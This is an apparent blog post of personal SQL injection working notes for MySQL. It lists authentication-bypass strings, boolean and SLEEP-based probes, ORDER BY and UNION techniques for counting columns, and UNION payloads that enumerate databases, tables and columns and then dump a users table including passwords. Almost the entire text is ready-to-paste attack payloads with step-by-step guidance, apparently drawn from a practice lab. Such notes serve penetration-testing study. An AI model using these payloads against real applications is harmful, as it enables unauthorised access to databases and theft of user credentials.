Working notes
%20 = space
%27 = ‘
-- adfdsfdsf is comment
%23=#
@@version
@@hostname
user()
database()
Check Vulnerability
Admin’ or ‘’=’
Admin’ or ‘a’=’a’-- asd
Admin’ or ‘a’=’a
admin’ -- lk
admin' AND 1696=1696 AND 'LeED'='LeED
admin' AND SLEEP(5) AND 'BOnx'='BOnx
admin' ORDER BY 1-- lpmY
admin' ORDER BY 100-- lpmY
password(‘a’) != password(‘A’)
root'/**/or/**/'1'='1
Get number of Columns
- Order By Based
- admin%27%20order%20by%203--%20l (' order by 3-- lgh)
- Keep increasing the number till you hit and error.
- If you git error at 6, then number of columns is 5.
- Union Based
- Admin’ union select null, null,.......,null-- lk
- If 3 nulls give the true/original response, then number of columns is 3. Keep increasing to get the correct number of columns.
- admin%27%20union%20select%20database(),user(),@@version,null,null--%20j (admin' union select database(),user(),@@version,null,null-- j)
Get list of databases
- admin' UNION SELECT NULL,NULL,schema_name,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- RPYg
Get list of tables in a particular DB
- admin' UNION ALL SELECT NULL,NULL,table_name ,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='information_schema'-- SlTg
Get Column names in a table
- admin' UNION ALL SELECT NULL,COLUMN_TYPE,COLUMN_NAME,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='exercises' AND TABLE_NAME='users'-- RPYg
- admin' UNION ALL SELECT NULL,NULL,COLUMN_NAME,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='exercises' AND TABLE_NAME='users'-- RPYg
Get data from table (after column names)
- admin' UNION ALL SELECT NULL,NULL,CONCAT(';;',age,';;',groupid,';;',id,';;',name,';;',passwd,';;'),NULL,NULL FROM exercises.users-- BxLe
- Age, group,id where names of the columns retrieved above.
References:
No comments:
Post a Comment